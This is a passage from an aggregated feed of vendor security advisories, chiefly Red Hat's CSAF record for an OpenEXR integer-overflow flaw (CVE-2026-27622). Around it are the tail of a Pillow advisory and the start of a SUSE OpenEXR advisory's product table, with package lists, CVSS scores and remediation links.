"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Pillow: Pillow: Denial of Service via decompression bomb in FITS image processing"
}
]
}
RHSA-2026:12340
Vulnerability from csaf_redhat - Published: 2026-04-30 14:33 - Updated: 2026-05-14 22:36A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-8.2.0.Z.AUS:OpenEXR-0:2.2.0-11.el8_2.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for OpenEXR is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial Light \u0026 Magic for use in computer imaging applications. This package contains libraries and sample applications for handling the format. \n\nSecurity Fix(es):\n\n* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:12340",
"url": "https://access.redhat.com/errata/RHSA-2026:12340"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_12340.json"
}
],
"title": "Red Hat Security Advisory: OpenEXR security update",
"tracking": {
"current_release_date": "2026-05-14T22:36:28+00:00",
"generator": {
"date": "2026-05-14T22:36:28+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:12340",
"initial_release_date": "2026-04-30T14:33:24+00:00",
"revision_history": [
{
"date": "2026-04-30T14:33:24+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-30T14:33:24+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-14T22:36:28+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product": {
"name": "Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_aus:8.2::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-0:2.2.0-11.el8_2.1.src",
"product": {
"name": "OpenEXR-0:2.2.0-11.el8_2.1.src",
"product_id": "OpenEXR-0:2.2.0-11.el8_2.1.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR@2.2.0-11.el8_2.1?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-11.el8_2.1.i686",
"product": {
"name": "OpenEXR-libs-0:2.2.0-11.el8_2.1.i686",
"product_id": "OpenEXR-libs-0:2.2.0-11.el8_2.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-11.el8_2.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686",
"product_id": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-11.el8_2.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686",
"product_id": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-11.el8_2.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-11.el8_2.1?arch=i686"
}
}
}
],
"category": "architecture",
"name": "i686"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64",
"product": {
"name": "OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64",
"product_id": "OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-11.el8_2.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64",
"product_id": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-11.el8_2.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"product_id": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-11.el8_2.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-11.el8_2.1?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-0:2.2.0-11.el8_2.1.src as a component of Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS:OpenEXR-0:2.2.0-11.el8_2.1.src"
},
"product_reference": "OpenEXR-0:2.2.0-11.el8_2.1.src",
"relates_to_product_reference": "AppStream-8.2.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686",
"relates_to_product_reference": "AppStream-8.2.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"relates_to_product_reference": "AppStream-8.2.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686",
"relates_to_product_reference": "AppStream-8.2.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64",
"relates_to_product_reference": "AppStream-8.2.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-11.el8_2.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.i686"
},
"product_reference": "OpenEXR-libs-0:2.2.0-11.el8_2.1.i686",
"relates_to_product_reference": "AppStream-8.2.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64",
"relates_to_product_reference": "AppStream-8.2.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686",
"relates_to_product_reference": "AppStream-8.2.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"product_id": "AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"relates_to_product_reference": "AppStream-8.2.0.Z.AUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.2.0.Z.AUS:OpenEXR-0:2.2.0-11.el8_2.1.src",
"AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-30T14:33:24+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.2.0.Z.AUS:OpenEXR-0:2.2.0-11.el8_2.1.src",
"AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:12340"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.2.0.Z.AUS:OpenEXR-0:2.2.0-11.el8_2.1.src",
"AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-8.2.0.Z.AUS:OpenEXR-0:2.2.0-11.el8_2.1.src",
"AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-0:2.2.0-11.el8_2.1.x86_64",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.i686",
"AppStream-8.2.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-11.el8_2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
}
]
}
SUSE-SU-2026:20936-1
Vulnerability from csaf_suse - Published: 2026-03-26 10:00 - Updated: 2026-03-26 10:00| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 16.0:openexr-doc-3.2.2-160000.5.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
